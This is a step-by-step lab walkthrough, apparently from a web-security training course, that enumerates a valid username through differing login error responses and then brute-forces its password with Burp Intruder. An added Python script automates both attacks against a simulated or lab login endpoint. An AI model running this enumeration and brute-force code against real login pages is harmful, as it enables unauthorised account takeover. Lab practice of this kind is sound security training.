
Username enumeration via different responses

1

We can click on My Account to reach the login form and submit a login attempt with any username and password.

2

In Burp Suite, open Proxy > HTTP history and locate the POST request for that login attempt.

3

Let's send it to Intruder, clear the default positions, and mark the value of the username parameter as the only payload position. The password stays fixed at any incorrect value.

4

Next, on the Payloads tab, set the Payload type to Simple list and paste the candidate usernames provided with the lab into the Payload settings section.

5

Let's start the attack.

6

Sorting the results by status code and response length, we can observe that the request with username set to analyzer returned a different response than the others.

This is because the application's error message depends on whether the submitted username exists: every invalid username produced an identical response, while the one valid username, analyzer, produced a different one. That difference is the enumeration vulnerability.

Now we can craft a second attack by fixing the username parameter to analyzer and marking the password parameter as the payload position.

7

In the Payloads tab we will again use a Simple list.

Let's paste the candidate passwords provided with the lab into the Payload settings section.

8

We are now set to start the attack.

9

As we can see, the request with the password set to 1234567890 receives a 302 response, the redirect the application issues after a successful login, whereas every other password is answered with the login error page.

Now that we know what the username and password are, let's login.

Username: analyzer
Password: 1234567890
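The two Intruder attacks above can also be scripted. The following is an added example, not part of the original walkthrough, that reproduces them with Python's standard library: fingerprint every response by status code and body length (the columns Intruder is sorted by), pick the single username whose fingerprint differs, then spray passwords against it and stop at the first 302. The lab hostname, the form field names username and password, and the wordlists are assumptions; simulated_login is a constructed stand-in for the lab so the script runs offline.

```python
"""Username enumeration via different responses, then a password attack.

Added example (not the walkthrough's own code): the two Intruder attacks
driven from Python's standard library.  LOGIN_URL, the field names
``username``/``password`` and the wordlists are assumptions.
"""
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter

LOGIN_URL = "https://YOUR-LAB-ID.web-security-academy.net/login"  # assumed


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib following redirects, so the 302 sent after a valid
    login is returned as-is instead of being replaced by its target page."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def post_login(username, password, url=LOGIN_URL):
    """POST one credential pair to the real lab and return (status, body)."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:  # raised for the 302 (NoRedirect) and for 4xx/5xx
        return err.code, err.read().decode(errors="replace")


def odd_ones_out(results):
    """results: {candidate: (status, body)}.  Fingerprint each response by
    status code and body length and return the candidates whose fingerprint
    is not the most common one (the 'different response' signal)."""
    fingerprints = {cand: (status, len(body)) for cand, (status, body) in results.items()}
    counts = Counter(fingerprints.values())
    if len(counts) < 2:
        return []
    common = counts.most_common(1)[0][0]
    return [cand for cand, fp in fingerprints.items() if fp != common]


def enumerate_usernames(usernames, send):
    """Attack 1: fixed wrong password, username taken from the wordlist."""
    return odd_ones_out({u: send(u, "not-the-password") for u in usernames})


def brute_force_password(username, passwords, send):
    """Attack 2: fixed username, password taken from the wordlist; the
    first request answered with a 302 redirect is the successful login."""
    for pwd in passwords:
        status, _ = send(username, pwd)
        if status == 302:
            return pwd
    return None


def simulated_login(username, password):
    """Constructed stand-in for the lab so the script runs offline.  The
    error text differs depending on whether the username exists, which is
    the leak the lab is about; the messages are made up for this example."""
    if username != "analyzer":
        return 200, "<p class=is-warning>Invalid username</p>"
    if password != "1234567890":
        return 200, "<p class=is-warning>Incorrect password</p>"
    return 302, ""


if __name__ == "__main__":
    # Swap simulated_login for post_login to run against the real lab.
    send = simulated_login
    users = ["wiener", "admin", "analyzer", "carlos"]  # constructed wordlist
    found = enumerate_usernames(users, send)
    print("candidate usernames:", found)
    if len(found) == 1:
        pwd = brute_force_password(found[0], ["password", "123456", "1234567890"], send)
        print("password:", pwd)
```

Body length is used rather than the full body because many login pages embed a per-request token, which would make every response look unique; if the real target does that, strip the token before comparing. Sending the username attack with a single fixed wrong password also keeps the comparison fair, since only one parameter changes between requests.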

10

We have solved the lab.
